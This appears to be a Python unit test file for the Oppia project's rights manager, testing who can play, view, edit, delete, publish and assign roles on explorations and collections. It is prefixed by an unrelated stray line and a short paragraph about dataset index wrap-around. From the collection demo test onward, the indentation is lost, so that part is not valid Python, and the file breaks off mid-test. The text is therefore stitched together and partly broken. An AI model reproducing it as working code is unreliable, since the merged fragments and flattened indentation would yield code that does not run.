        return len(self.parser) * self.epoch
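Both dataset classes stretch one pass over the parser across `epoch` passes: `__len__` reports `len(parser) * epoch`, while `__getitem__` folds any index back into the parser's real range with a modulo. A minimal sketch of that wrap-around (the names here are illustrative, not from the original):

```python
def wrap_index(item, parser_len, epoch):
    # An index in [0, parser_len * epoch) maps back to a real sample index.
    assert 0 <= item < parser_len * epoch
    return item % parser_len

# With 5 underlying samples and epoch=3, indices 0..14 cycle through 0..4:
indices = [wrap_index(i, 5, 3) for i in range(15)]
```

This lets a single DataLoader "epoch" cover the underlying data several times without rebuilding the dataset.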
# rights_manager_test.py (core/domain/rights_manager_test.py from Himanshu1495/oppia, Apache-2.0 license)
# Copyright 2014 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for classes and methods relating to user rights."""
from core.domain import collection_services
from core.domain import exp_domain
from core.domain import exp_services
from core.domain import rights_manager
from core.tests import test_utils
import feconf

class ExplorationRightsTests(test_utils.GenericTestBase):
    """Test that rights for actions on explorations work as expected."""

    EXP_ID = 'exp_id'

    def setUp(self):
        super(ExplorationRightsTests, self).setUp()
        self.signup('a@example.com', 'A')
        self.signup('b@example.com', 'B')
        self.signup('c@example.com', 'C')
        self.signup('d@example.com', 'D')
        self.signup('e@example.com', 'E')
        self.signup(self.ADMIN_EMAIL, username=self.ADMIN_USERNAME)

        self.user_id_a = self.get_user_id_from_email('a@example.com')
        self.user_id_b = self.get_user_id_from_email('b@example.com')
        self.user_id_c = self.get_user_id_from_email('c@example.com')
        self.user_id_d = self.get_user_id_from_email('d@example.com')
        self.user_id_e = self.get_user_id_from_email('e@example.com')
        self.user_id_admin = self.get_user_id_from_email(self.ADMIN_EMAIL)
        self.set_admins([self.ADMIN_USERNAME])

    def test_get_exploration_rights_for_nonexistent_exploration(self):
        non_exp_id = 'this_exp_does_not_exist_id'

        with self.assertRaisesRegexp(
            Exception,
            'Entity for class ExplorationRightsModel with id '
            'this_exp_does_not_exist_id not found'
        ):
            rights_manager.get_exploration_rights(non_exp_id)

        self.assertIsNone(
            rights_manager.get_exploration_rights(non_exp_id, strict=False))

    def test_demo_exploration(self):
        exp_services.load_demo('1')
        rights_manager.release_ownership_of_exploration(
            feconf.SYSTEM_COMMITTER_ID, '1')

        self.assertTrue(
            rights_manager.Actor(self.user_id_a).can_play(
                rights_manager.ACTIVITY_TYPE_EXPLORATION, '1'))
        self.assertTrue(
            rights_manager.Actor(self.user_id_a).can_view(
                rights_manager.ACTIVITY_TYPE_EXPLORATION, '1'))
        self.assertTrue(
            rights_manager.Actor(self.user_id_a).can_edit(
                rights_manager.ACTIVITY_TYPE_EXPLORATION, '1'))
        self.assertFalse(
            rights_manager.Actor(self.user_id_a).can_delete(
                rights_manager.ACTIVITY_TYPE_EXPLORATION, '1'))

        self.assertTrue(
            rights_manager.Actor(self.user_id_admin).can_play(
                rights_manager.ACTIVITY_TYPE_EXPLORATION, '1'))
        self.assertTrue(
            rights_manager.Actor(self.user_id_admin).can_view(
                rights_manager.ACTIVITY_TYPE_EXPLORATION, '1'))
        self.assertTrue(
            rights_manager.Actor(self.user_id_admin).can_edit(
                rights_manager.ACTIVITY_TYPE_EXPLORATION, '1'))
        self.assertTrue(
            rights_manager.Actor(self.user_id_admin).can_delete(
                rights_manager.ACTIVITY_TYPE_EXPLORATION, '1'))

    def test_non_splash_page_demo_exploration(self):
        # Note: there is no difference between permissions for demo
        # explorations, whether or not they are on the splash page.
        exp_services.load_demo('3')
        rights_manager.release_ownership_of_exploration(
            feconf.SYSTEM_COMMITTER_ID, '3')

        self.assertTrue(
            rights_manager.Actor(self.user_id_a).can_play(
                rights_manager.ACTIVITY_TYPE_EXPLORATION, '3'))
        self.assertTrue(
            rights_manager.Actor(self.user_id_a).can_view(
                rights_manager.ACTIVITY_TYPE_EXPLORATION, '3'))
        self.assertTrue(rights_manager.Actor(
            self.user_id_a).can_edit(
                rights_manager.ACTIVITY_TYPE_EXPLORATION, '3'))
        self.assertFalse(rights_manager.Actor(
            self.user_id_a).can_delete(
                rights_manager.ACTIVITY_TYPE_EXPLORATION, '3'))

        self.assertTrue(
            rights_manager.Actor(self.user_id_admin).can_play(
                rights_manager.ACTIVITY_TYPE_EXPLORATION, '3'))
        self.assertTrue(
            rights_manager.Actor(self.user_id_admin).can_view(
                rights_manager.ACTIVITY_TYPE_EXPLORATION, '3'))
        self.assertTrue(rights_manager.Actor(
            self.user_id_admin).can_edit(
                rights_manager.ACTIVITY_TYPE_EXPLORATION, '3'))
        self.assertTrue(
            rights_manager.Actor(self.user_id_admin).can_delete(
                rights_manager.ACTIVITY_TYPE_EXPLORATION, '3'))

    def test_ownership_of_exploration(self):
        exp = exp_domain.Exploration.create_default_exploration(
            self.EXP_ID, 'A title', 'A category')
        exp_services.save_new_exploration(self.user_id_a, exp)

        rights_manager.assign_role_for_exploration(
            self.user_id_a, self.EXP_ID, self.user_id_b,
            rights_manager.ROLE_EDITOR)

        self.assertTrue(
            rights_manager.Actor(self.user_id_a).is_owner(
                rights_manager.ACTIVITY_TYPE_EXPLORATION, self.EXP_ID))
        self.assertFalse(
            rights_manager.Actor(self.user_id_b).is_owner(
                rights_manager.ACTIVITY_TYPE_EXPLORATION, self.EXP_ID))
        self.assertFalse(
            rights_manager.Actor(self.user_id_admin).is_owner(
                rights_manager.ACTIVITY_TYPE_EXPLORATION, self.EXP_ID))

    def test_newly_created_exploration(self):
        exp = exp_domain.Exploration.create_default_exploration(
            self.EXP_ID, 'A title', 'A category')
        exp_services.save_new_exploration(self.user_id_a, exp)

        self.assertTrue(
            rights_manager.Actor(self.user_id_a).can_play(
                rights_manager.ACTIVITY_TYPE_EXPLORATION, self.EXP_ID))
        self.assertTrue(
            rights_manager.Actor(self.user_id_a).can_view(
                rights_manager.ACTIVITY_TYPE_EXPLORATION, self.EXP_ID))
        self.assertTrue(
            rights_manager.Actor(self.user_id_a).can_edit(
                rights_manager.ACTIVITY_TYPE_EXPLORATION, self.EXP_ID))
        self.assertTrue(
            rights_manager.Actor(self.user_id_a).can_delete(
                rights_manager.ACTIVITY_TYPE_EXPLORATION, self.EXP_ID))

        self.assertTrue(
            rights_manager.Actor(self.user_id_admin).can_play(
                rights_manager.ACTIVITY_TYPE_EXPLORATION, self.EXP_ID))
        self.assertTrue(
            rights_manager.Actor(self.user_id_admin).can_view(
                rights_manager.ACTIVITY_TYPE_EXPLORATION, self.EXP_ID))
        self.assertFalse(
            rights_manager.Actor(self.user_id_admin).can_edit(
                rights_manager.ACTIVITY_TYPE_EXPLORATION, self.EXP_ID))
        self.assertFalse(
            rights_manager.Actor(self.user_id_admin).can_delete(
                rights_manager.ACTIVITY_TYPE_EXPLORATION, self.EXP_ID))

        self.assertFalse(
            rights_manager.Actor(self.user_id_b).can_play(
                rights_manager.ACTIVITY_TYPE_EXPLORATION, self.EXP_ID))
        self.assertFalse(
            rights_manager.Actor(self.user_id_b).can_view(
                rights_manager.ACTIVITY_TYPE_EXPLORATION, self.EXP_ID))
        self.assertFalse(
            rights_manager.Actor(self.user_id_b).can_edit(
                rights_manager.ACTIVITY_TYPE_EXPLORATION, self.EXP_ID))
        self.assertFalse(
            rights_manager.Actor(self.user_id_b).can_delete(
                rights_manager.ACTIVITY_TYPE_EXPLORATION, self.EXP_ID))

    def test_inviting_collaborator_to_exploration(self):
        exp = exp_domain.Exploration.create_default_exploration(
            self.EXP_ID, 'A title', 'A category')
        exp_services.save_new_exploration(self.user_id_a, exp)

        self.assertFalse(
            rights_manager.Actor(self.user_id_b).can_play(
                rights_manager.ACTIVITY_TYPE_EXPLORATION, self.EXP_ID))
        self.assertFalse(
            rights_manager.Actor(self.user_id_b).can_view(
                rights_manager.ACTIVITY_TYPE_EXPLORATION, self.EXP_ID))
        self.assertFalse(
            rights_manager.Actor(self.user_id_b).can_edit(
                rights_manager.ACTIVITY_TYPE_EXPLORATION, self.EXP_ID))
        self.assertFalse(
            rights_manager.Actor(self.user_id_b).can_delete(
                rights_manager.ACTIVITY_TYPE_EXPLORATION, self.EXP_ID))

        rights_manager.assign_role_for_exploration(
            self.user_id_a, self.EXP_ID, self.user_id_b,
            rights_manager.ROLE_EDITOR)

        self.assertTrue(
            rights_manager.Actor(self.user_id_b).can_play(
                rights_manager.ACTIVITY_TYPE_EXPLORATION, self.EXP_ID))
        self.assertTrue(
            rights_manager.Actor(self.user_id_b).can_view(
                rights_manager.ACTIVITY_TYPE_EXPLORATION, self.EXP_ID))
        self.assertTrue(
            rights_manager.Actor(self.user_id_b).can_edit(
                rights_manager.ACTIVITY_TYPE_EXPLORATION, self.EXP_ID))
        self.assertFalse(
            rights_manager.Actor(self.user_id_b).can_delete(
                rights_manager.ACTIVITY_TYPE_EXPLORATION, self.EXP_ID))

    def test_inviting_playtester_to_exploration(self):
        exp = exp_domain.Exploration.create_default_exploration(
            self.EXP_ID, 'A title', 'A category')
        exp_services.save_new_exploration(self.user_id_a, exp)

        self.assertFalse(
            rights_manager.Actor(self.user_id_b).can_play(
                rights_manager.ACTIVITY_TYPE_EXPLORATION, self.EXP_ID))
        self.assertFalse(
            rights_manager.Actor(self.user_id_b).can_view(
                rights_manager.ACTIVITY_TYPE_EXPLORATION, self.EXP_ID))
        self.assertFalse(
            rights_manager.Actor(self.user_id_b).can_edit(
                rights_manager.ACTIVITY_TYPE_EXPLORATION, self.EXP_ID))
        self.assertFalse(
            rights_manager.Actor(self.user_id_b).can_delete(
                rights_manager.ACTIVITY_TYPE_EXPLORATION, self.EXP_ID))

        rights_manager.assign_role_for_exploration(
            self.user_id_a, self.EXP_ID, self.user_id_b,
            rights_manager.ROLE_VIEWER)

        self.assertTrue(
            rights_manager.Actor(self.user_id_b).can_play(
                rights_manager.ACTIVITY_TYPE_EXPLORATION, self.EXP_ID))
        self.assertTrue(
            rights_manager.Actor(self.user_id_b).can_view(
                rights_manager.ACTIVITY_TYPE_EXPLORATION, self.EXP_ID))
        self.assertFalse(
            rights_manager.Actor(self.user_id_b).can_edit(
                rights_manager.ACTIVITY_TYPE_EXPLORATION, self.EXP_ID))
        self.assertFalse(
            rights_manager.Actor(self.user_id_b).can_delete(
                rights_manager.ACTIVITY_TYPE_EXPLORATION, self.EXP_ID))

    def test_setting_rights_of_exploration(self):
        exp = exp_domain.Exploration.create_default_exploration(
            self.EXP_ID, 'A title', 'A category')
        exp_services.save_new_exploration(self.user_id_a, exp)

        rights_manager.assign_role_for_exploration(
            self.user_id_a, self.EXP_ID, self.user_id_b,
            rights_manager.ROLE_VIEWER)

        with self.assertRaisesRegexp(Exception, 'Could not assign new role.'):
            rights_manager.assign_role_for_exploration(
                self.user_id_b, self.EXP_ID, self.user_id_c,
                rights_manager.ROLE_VIEWER)

        rights_manager.assign_role_for_exploration(
            self.user_id_a, self.EXP_ID, self.user_id_b,
            rights_manager.ROLE_EDITOR)

        with self.assertRaisesRegexp(Exception, 'Could not assign new role.'):
            rights_manager.assign_role_for_exploration(
                self.user_id_b, self.EXP_ID, self.user_id_c,
                rights_manager.ROLE_VIEWER)

        rights_manager.assign_role_for_exploration(
            self.user_id_a, self.EXP_ID, self.user_id_b,
            rights_manager.ROLE_OWNER)

        rights_manager.assign_role_for_exploration(
            self.user_id_b, self.EXP_ID, self.user_id_c,
            rights_manager.ROLE_OWNER)
        rights_manager.assign_role_for_exploration(
            self.user_id_b, self.EXP_ID, self.user_id_d,
            rights_manager.ROLE_EDITOR)
        rights_manager.assign_role_for_exploration(
            self.user_id_b, self.EXP_ID, self.user_id_e,
            rights_manager.ROLE_VIEWER)

    def test_publishing_and_unpublishing_exploration(self):
        exp = exp_domain.Exploration.create_default_exploration(
            self.EXP_ID, 'A title', 'A category')
        exp_services.save_new_exploration(self.user_id_a, exp)

        self.assertFalse(
            rights_manager.Actor(self.user_id_b).can_play(
                rights_manager.ACTIVITY_TYPE_EXPLORATION, self.EXP_ID))
        self.assertFalse(
            rights_manager.Actor(self.user_id_b).can_view(
                rights_manager.ACTIVITY_TYPE_EXPLORATION, self.EXP_ID))

        rights_manager.publish_exploration(self.user_id_a, self.EXP_ID)

        self.assertTrue(
            rights_manager.Actor(self.user_id_b).can_play(
                rights_manager.ACTIVITY_TYPE_EXPLORATION, self.EXP_ID))
        self.assertTrue(
            rights_manager.Actor(self.user_id_b).can_view(
                rights_manager.ACTIVITY_TYPE_EXPLORATION, self.EXP_ID))
        self.assertFalse(
            rights_manager.Actor(self.user_id_a).can_unpublish(
                rights_manager.ACTIVITY_TYPE_EXPLORATION, self.EXP_ID))

        rights_manager.unpublish_exploration(self.user_id_admin, self.EXP_ID)

        self.assertTrue(
            rights_manager.Actor(self.user_id_a).can_play(
                rights_manager.ACTIVITY_TYPE_EXPLORATION, self.EXP_ID))
        self.assertTrue(
            rights_manager.Actor(self.user_id_a).can_view(
                rights_manager.ACTIVITY_TYPE_EXPLORATION, self.EXP_ID))
        self.assertFalse(
            rights_manager.Actor(self.user_id_b).can_play(
                rights_manager.ACTIVITY_TYPE_EXPLORATION, self.EXP_ID))
        self.assertFalse(
            rights_manager.Actor(self.user_id_b).can_view(
                rights_manager.ACTIVITY_TYPE_EXPLORATION, self.EXP_ID))

    def test_can_only_delete_unpublished_explorations(self):
        exp = exp_domain.Exploration.create_default_exploration(
            self.EXP_ID, 'A title', 'A category')
        exp_services.save_new_exploration(self.user_id_a, exp)

        self.assertTrue(
            rights_manager.Actor(self.user_id_a).can_delete(
                rights_manager.ACTIVITY_TYPE_EXPLORATION, self.EXP_ID))

        rights_manager.publish_exploration(self.user_id_a, self.EXP_ID)

        self.assertFalse(
            rights_manager.Actor(self.user_id_a).can_delete(
                rights_manager.ACTIVITY_TYPE_EXPLORATION, self.EXP_ID))

        rights_manager.unpublish_exploration(self.user_id_admin, self.EXP_ID)

        self.assertTrue(
            rights_manager.Actor(self.user_id_a).can_delete(
                rights_manager.ACTIVITY_TYPE_EXPLORATION, self.EXP_ID))

    def test_can_publicize_exploration(self):
        exp = exp_domain.Exploration.create_default_exploration(
            self.EXP_ID, 'A title', 'A category')
        exp_services.save_new_exploration(self.user_id_a, exp)

        rights_manager.publish_exploration(self.user_id_a, self.EXP_ID)

        self.assertFalse(
            rights_manager.Actor(self.user_id_a).can_publicize(
                rights_manager.ACTIVITY_TYPE_EXPLORATION, self.EXP_ID))
        self.assertTrue(
            rights_manager.Actor(self.user_id_admin).can_publicize(
                rights_manager.ACTIVITY_TYPE_EXPLORATION, self.EXP_ID))

    def test_changing_viewability_of_exploration(self):
        exp = exp_domain.Exploration.create_default_exploration(
            self.EXP_ID, 'A title', 'A category')
        exp_services.save_new_exploration(self.user_id_a, exp)

        self.assertFalse(
            rights_manager.Actor(self.user_id_b).can_view(
                rights_manager.ACTIVITY_TYPE_EXPLORATION, self.EXP_ID))

        self.assertTrue(rights_manager.Actor(
            self.user_id_a).can_change_private_viewability(
                rights_manager.ACTIVITY_TYPE_EXPLORATION, self.EXP_ID))
        self.assertFalse(rights_manager.Actor(
            self.user_id_b).can_change_private_viewability(
                rights_manager.ACTIVITY_TYPE_EXPLORATION, self.EXP_ID))
        self.assertTrue(rights_manager.Actor(
            self.user_id_admin).can_change_private_viewability(
                rights_manager.ACTIVITY_TYPE_EXPLORATION, self.EXP_ID))

        with self.assertRaisesRegexp(Exception, 'already the current value'):
            rights_manager.set_private_viewability_of_exploration(
                self.user_id_a, self.EXP_ID, False)
        with self.assertRaisesRegexp(Exception, 'cannot be changed'):
            rights_manager.set_private_viewability_of_exploration(
                self.user_id_b, self.EXP_ID, True)

        rights_manager.set_private_viewability_of_exploration(
            self.user_id_a, self.EXP_ID, True)
        self.assertTrue(
            rights_manager.Actor(self.user_id_a).can_view(
                rights_manager.ACTIVITY_TYPE_EXPLORATION, self.EXP_ID))
        self.assertTrue(
            rights_manager.Actor(self.user_id_b).can_view(
                rights_manager.ACTIVITY_TYPE_EXPLORATION, self.EXP_ID))

        rights_manager.set_private_viewability_of_exploration(
            self.user_id_a, self.EXP_ID, False)
        self.assertTrue(
            rights_manager.Actor(self.user_id_a).can_view(
                rights_manager.ACTIVITY_TYPE_EXPLORATION, self.EXP_ID))
        self.assertFalse(
            rights_manager.Actor(self.user_id_b).can_view(
                rights_manager.ACTIVITY_TYPE_EXPLORATION, self.EXP_ID))

        rights_manager.publish_exploration(self.user_id_a, self.EXP_ID)
        self.assertFalse(rights_manager.Actor(
            self.user_id_a).can_change_private_viewability(
                rights_manager.ACTIVITY_TYPE_EXPLORATION, self.EXP_ID))

        rights_manager.unpublish_exploration(self.user_id_admin, self.EXP_ID)
        self.assertTrue(rights_manager.Actor(
            self.user_id_a).can_change_private_viewability(
                rights_manager.ACTIVITY_TYPE_EXPLORATION, self.EXP_ID))
        self.assertFalse(rights_manager.Actor(
            self.user_id_b).can_change_private_viewability(
                rights_manager.ACTIVITY_TYPE_EXPLORATION, self.EXP_ID))
        self.assertTrue(rights_manager.Actor(
            self.user_id_admin).can_change_private_viewability(
                rights_manager.ACTIVITY_TYPE_EXPLORATION, self.EXP_ID))


class CollectionRightsTests(test_utils.GenericTestBase):
    """Test that rights for actions on collections work as expected."""

    COLLECTION_ID = 'collection_id'
    EXP_ID_FOR_COLLECTION = 'exp_id_for_collection'

    def setUp(self):
        super(CollectionRightsTests, self).setUp()
        self.signup('a@example.com', 'A')
        self.signup('b@example.com', 'B')
        self.signup('c@example.com', 'C')
        self.signup('d@example.com', 'D')
        self.signup('e@example.com', 'E')
        self.signup(self.ADMIN_EMAIL, username=self.ADMIN_USERNAME)

        self.user_id_a = self.get_user_id_from_email('a@example.com')
        self.user_id_b = self.get_user_id_from_email('b@example.com')
        self.user_id_c = self.get_user_id_from_email('c@example.com')
        self.user_id_d = self.get_user_id_from_email('d@example.com')
        self.user_id_e = self.get_user_id_from_email('e@example.com')
        self.user_id_admin = self.get_user_id_from_email(self.ADMIN_EMAIL)
        self.set_admins([self.ADMIN_USERNAME])

    def test_get_collection_rights_for_nonexistent_collection(self):
        non_col_id = 'this_collection_does_not_exist_id'

        with self.assertRaisesRegexp(
            Exception,
            'Entity for class CollectionRightsModel with id '
            'this_collection_does_not_exist_id not found'
        ):
            rights_manager.get_collection_rights(non_col_id)

        self.assertIsNone(
            rights_manager.get_collection_rights(non_col_id, strict=False))

    def test_demo_collection(self):
        collection_services.load_demo('0')
        rights_manager.release_ownership_of_collection(
            feconf.SYSTEM_COMMITTER_ID, '0')

        self.assertTrue(
            rights_manager.Actor(self.user_id_a).can_play(
                rights_manager.ACTIVITY_TYPE_COLLECTION, '0'))
        self.assertTrue(
            rights_manager.Actor(self.user_id_a).can_view(
                rights_manager.ACTIVITY_TYPE_COLLECTION, '0'))
        self.assertTrue(
            rights_manager.Actor(self.user_id_a).can_edit(
                rights_manager.ACTIVITY_TYPE_COLLECTION, '0'))
        self.assertFalse(
            rights_manager.Actor(self.user_id_a).can_delete(
                rights_manager.ACTIVITY_TYPE_COLLECTION, '0'))

        self.assertTrue(
            rights_manager.Actor(self.user_id_admin).can_play(
                rights_manager.ACTIVITY_TYPE_COLLECTION, '0'))
self.assertTrue(
rights_manager.Actor(self.user_id_admin).can_view(
rights_manager.ACTIVITY_TYPE_COLLECTION, '0'))
self.assertTrue(
rights_manager.Actor(self.user_id_admin).can_edit(
rights_manager.ACTIVITY_TYPE_COLLECTION, '0'))
self.assertTrue(
rights_manager.Actor(self.user_id_admin).can_delete(
rights_manager.ACTIVITY_TYPE_COLLECTION, '0'))
def test_ownership_of_collection(self):
self.save_new_default_collection(self.COLLECTION_ID, self.user_id_a)
rights_manager.assign_role_for_collection(
self.user_id_a, self.COLLECTION_ID, self.user_id_b,
rights_manager.ROLE_EDITOR)
self.assertTrue(
rights_manager.Actor(self.user_id_a).is_owner(
rights_manager.ACTIVITY_TYPE_COLLECTION, self.COLLECTION_ID))
self.assertFalse(
rights_manager.Actor(self.user_id_b).is_owner(
rights_manager.ACTIVITY_TYPE_COLLECTION, self.COLLECTION_ID))
self.assertFalse(
rights_manager.Actor(self.user_id_admin).is_owner(
rights_manager.ACTIVITY_TYPE_COLLECTION, self.COLLECTION_ID))
def test_newly_created_collection(self):
self.save_new_default_collection(self.COLLECTION_ID, self.user_id_a)
self.assertTrue(
rights_manager.Actor(self.user_id_a).can_play(
rights_manager.ACTIVITY_TYPE_COLLECTION, self.COLLECTION_ID))
self.assertTrue(
rights_manager.Actor(self.user_id_a).can_view(
rights_manager.ACTIVITY_TYPE_COLLECTION, self.COLLECTION_ID))
self.assertTrue(
rights_manager.Actor(self.user_id_a).can_edit(
rights_manager.ACTIVITY_TYPE_COLLECTION, self.COLLECTION_ID))
self.assertTrue(
rights_manager.Actor(self.user_id_a).can_delete(
rights_manager.ACTIVITY_TYPE_COLLECTION, self.COLLECTION_ID))
self.assertTrue(
rights_manager.Actor(self.user_id_admin).can_play(
rights_manager.ACTIVITY_TYPE_COLLECTION, self.COLLECTION_ID))
self.assertTrue(
rights_manager.Actor(self.user_id_admin).can_view(
rights_manager.ACTIVITY_TYPE_COLLECTION, self.COLLECTION_ID))
self.assertFalse(
rights_manager.Actor(self.user_id_admin).can_edit(
rights_manager.ACTIVITY_TYPE_COLLECTION, self.COLLECTION_ID))
self.assertFalse(
rights_manager.Actor(self.user_id_admin).can_delete(
rights_manager.ACTIVITY_TYPE_COLLECTION, self.COLLECTION_ID))
self.assertFalse(
rights_manager.Actor(self.user_id_b).can_play(
rights_manager.ACTIVITY_TYPE_COLLECTION, self.COLLECTION_ID))
self.assertFalse(
rights_manager.Actor(self.user_id_b).can_view(
rights_manager.ACTIVITY_TYPE_COLLECTION, self.COLLECTION_ID))
self.assertFalse(
rights_manager.Actor(self.user_id_b).can_edit(
rights_manager.ACTIVITY_TYPE_COLLECTION, self.COLLECTION_ID))
self.assertFalse(
rights_manager.Actor(self.user_id_b).can_delete(
rights_manager.ACTIVITY_TYPE_COLLECTION, self.COLLECTION_ID))
def test_inviting_collaborator_to_collection(self):
self.save_new_valid_collection(
self.COLLECTION_ID, self.user_id_a,
exploration_id=self.EXP_ID_FOR_COLLECTION)
# Verify initial editor permissions for the collection.
self.assertFalse(
rights_manager.Actor(self.user_id_b).can_play(
rights_manager.ACTIVITY_TYPE_COLLECTION, self.COLLECTION_ID))
self.assertFalse(
rights_manager.Actor(self.user_id_b).can_view(
rights_manager.ACTIVITY_TYPE_COLLECTION, self.COLLECTION_ID))
self.assertFalse(
rights_manager.Actor(self.user_id_b).can_edit(
rights_manager.ACTIVITY_TYPE_COLLECTION, self.COLLECTION_ID))
self.assertFalse(
rights_manager.Actor(self.user_id_b).can_delete(
rights_manager.ACTIVITY_TYPE_COLLECTION, self.COLLECTION_ID))
# Verify initial editor permissions for the exploration within the
# collection.
self.assertFalse(
rights_manager.Actor(self.user_id_b).can_play(
rights_manager.ACTIVITY_TYPE_EXPLORATION,
self.EXP_ID_FOR_COLLECTION))
self.assertFalse(
rights_manager.Actor(self.user_id_b).can_view(
rights_manager.ACTIVITY_TYPE_EXPLORATION,
self.EXP_ID_FOR_COLLECTION))
self.assertFalse(
rights_manager.Actor(self.user_id_b).can_edit(
rights_manager.ACTIVITY_TYPE_EXPLORATION,
self.EXP_ID_FOR_COLLECTION))
self.assertFalse(
rights_manager.Actor(self.user_id_b).can_delete(
rights_manager.ACTIVITY_TYPE_EXPLORATION,
self.EXP_ID_FOR_COLLECTION))
# User A adds user B to the collection as an editor.
rights_manager.assign_role_for_collection(
self.user_id_a, self.COLLECTION_ID, self.user_id_b,
rights_manager.ROLE_EDITOR)
# Ensure User B is now an editor of the collection.
self.assertTrue(
rights_manager.Actor(self.user_id_b).can_play(
rights_manager.ACTIVITY_TYPE_COLLECTION, self.COLLECTION_ID))
self.assertTrue(
rights_manager.Actor(self.user_id_b).can_view(
rights_manager.ACTIVITY_TYPE_COLLECTION, self.COLLECTION_ID))
self.assertTrue(
rights_manager.Actor(self.user_id_b).can_edit(
rights_manager.ACTIVITY_TYPE_COLLECTION, self.COLLECTION_ID))
self.assertFalse(
rights_manager.Actor(self.user_id_b).can_delete(
rights_manager.ACTIVITY_TYPE_COLLECTION, self.COLLECTION_ID))
# Ensure User B is not an editor of the exploration within the
# collection.
self.assertFalse(
rights_manager.Actor(self.user_id_b).can_play(
rights_manager.ACTIVITY_TYPE_EXPLORATION,
self.EXP_ID_FOR_COLLECTION))
self.assertFalse(
rights_manager.Actor(self.user_id_b).can_view(
rights_manager.ACTIVITY_TYPE_EXPLORATION,
self.EXP_ID_FOR_COLLECTION))
self.assertFalse(
rights_manager.Actor(self.user_id_b).can_edit(
rights_manager.ACTIVITY_TYPE_EXPLORATION,
self.EXP_ID_FOR_COLLECTION))
self.assertFalse(
rights_manager.Actor(self.user_id_b).can_delete(
rights_manager.ACTIVITY_TYPE_EXPLORATION,
self.EXP_ID_FOR_COLLECTION))
def test_inviting_playtester_to_collection(self):
self.save_new_valid_collection(
self.COLLECTION_ID, self.user_id_a,
exploration_id=self.EXP_ID_FOR_COLLECTION)
# Verify initial viewer permissions for the collection.
self.assertFalse(
rights_manager.Actor(self.user_id_b).can_play(
rights_manager.ACTIVITY_TYPE_COLLECTION, self.COLLECTION_ID))
self.assertFalse(
rights_manager.Actor(self.user_id_b).can_view(
rights_manager.ACTIVITY_TYPE_COLLECTION, self.COLLECTION_ID))
self.assertFalse(
rights_manager.Actor(self.user_id_b).can_edit(
rights_manager.ACTIVITY_TYPE_COLLECTION, self.COLLECTION_ID))
self.assertFalse(
rights_manager.Actor(self.user_id_b).can_delete(
rights_manager.ACTIVITY_TYPE_COLLECTION, self.COLLECTION_ID))
# Verify initial viewer permissions for the exploration within the
# collection.
self.assertFalse(
rights_manager.Actor(self.user_id_b).can_play(
rights_manager.ACTIVITY_TYPE_EXPLORATION,
self.EXP_ID_FOR_COLLECTION))
self.assertFalse(
rights_manager.Actor(self.user_id_b).can_view(
rights_manager.ACTIVITY_TYPE_EXPLORATION,
self.EXP_ID_FOR_COLLECTION))
self.assertFalse(
rights_manager.Actor(self.user_id_b).can_edit(
rights_manager.ACTIVITY_TYPE_EXPLORATION,
self.EXP_ID_FOR_COLLECTION))
self.assertFalse(
rights_manager.Actor(self.user_id_b).can_delete(
rights_manager.ACTIVITY_TYPE_EXPLORATION,
self.EXP_ID_FOR_COLLECTION))
# User A adds user B to the collection as a viewer.
rights_manager.assign_role_for_collection(
self.user_id_a, self.COLLECTION_ID, self.user_id_b,
rights_manager.ROLE_VIEWER)
# Ensure User B is now a viewer of the collection.
self.assertTrue(
rights_manager.Actor(self.user_id_b).can_play(
rights_manager.ACTIVITY_TYPE_COLLECTION, self.COLLECTION_ID))
self.assertTrue(
rights_manager.Actor(self.user_id_b).can_view(
rights_manager.ACTIVITY_TYPE_COLLECTION, self.COLLECTION_ID))
self.assertFalse(
rights_manager.Actor(self.user_id_b).can_edit(
rights_manager.ACTIVITY_TYPE_COLLECTION, self.COLLECTION_ID))
self.assertFalse(
rights_manager.Actor(self.user_id_b).can_delete(
rights_manager.ACTIVITY_TYPE_COLLECTION, self.COLLECTION_ID))
# Ensure User B cannot view the exploration just because he/she has
# access to the collection containing it.
self.assertFalse(
rights_manager.Actor(self.user_id_b).can_play(
rights_manager.ACTIVITY_TYPE_EXPLORATION,
self.EXP_ID_FOR_COLLECTION))
self.assertFalse(
rights_manager.Actor(self.user_id_b).can_view(
rights_manager.ACTIVITY_TYPE_EXPLORATION,
self.EXP_ID_FOR_COLLECTION))
self.assertFalse(
rights_manager.Actor(self.user_id_b).can_edit(
rights_manager.ACTIVITY_TYPE_EXPLORATION,
self.EXP_ID_FOR_COLLECTION))
self.assertFalse(
rights_manager.Actor(self.user_id_b).can_delete(
rights_manager.ACTIVITY_TYPE_EXPLORATION,
self.EXP_ID_FOR_COLLECTION))
def test_setting_rights_of_collection(self):
self.save_new_default_collection(self.COLLECTION_ID, self.user_id_a)
rights_manager.assign_role_for_collection(
self.user_id_a, self.COLLECTION_ID, self.user_id_b,
rights_manager.ROLE_VIEWER)
with self.assertRaisesRegexp(Exception, 'Could not assign new role.'):
rights_manager.assign_role_for_collection(
self.user_id_b, self.COLLECTION_ID, self.user_id_c,
rights_manager.ROLE_VIEWER)
rights_manager.assign_role_for_collection(
self.user_id_a, self.COLLECTION_ID, self.user_id_b,
rights_manager.ROLE_EDITOR)
with self.assertRaisesRegexp(Exception, 'Could not assign new role.'):
rights_manager.assign_role_for_collection(
self.user_id_b, self.COLLECTION_ID, self.user_id_c,
rights_manager.ROLE_VIEWER)
rights_manager.assign_role_for_collection(
self.user_id_a, self.COLLECTION_ID, self.user_id_b,
rights_manager.ROLE_OWNER)
rights_manager.assign_role_for_collection(
self.user_id_b, self.COLLECTION_ID, self.user_id_c,
rights_manager.ROLE_OWNER)
rights_manager.assign_role_for_collection(
self.user_id_b, self.COLLECTION_ID, self.user_id_d,
rights_manager.ROLE_EDITOR)
rights_manager.assign_role_for_collection(
self.user_id_b, self.COLLECTION_ID, self.user_id_e,
rights_manager.ROLE_VIEWER)
def test_publishing_and_unpublishing_collection(self):
self.save_new_default_collection(self.COLLECTION_ID, self.user_id_a)
self.assertFalse(
rights_manager.Actor(self.user_id_b).can_play(
rights_manager.ACTIVITY_TYPE_COLLECTION, self.COLLECTION_ID))
self.assertFalse(
rights_manager.Actor(self.user_id_b).can_view(
rights_manager.ACTIVITY_TYPE_COLLECTION, self.COLLECTION_ID))
